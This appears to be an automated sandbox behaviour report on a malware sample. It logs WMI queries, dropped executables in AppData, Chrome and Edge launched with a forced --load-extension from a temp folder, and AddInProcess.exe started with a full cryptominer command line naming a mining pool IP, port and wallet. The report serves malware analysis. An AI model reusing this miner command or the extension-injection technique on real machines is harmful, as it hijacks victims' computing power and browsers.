Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AddInProcess.exe	String found in binary or memory: id-cmc-addExtensions
Source: AddInProcess.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

File read: C:\Users\user\Desktop\zlONcFaXkc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zlONcFaXkc.exe "C:\Users\user\Desktop\zlONcFaXkc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,18268589753722857029,6653790801772642783,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6956 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2120,i,14171565827234090732,9899416858446876294,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3028 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,18268589753722857029,6653790801772642783,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6956 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3028 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2120,i,14171565827234090732,9899416858446876294,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
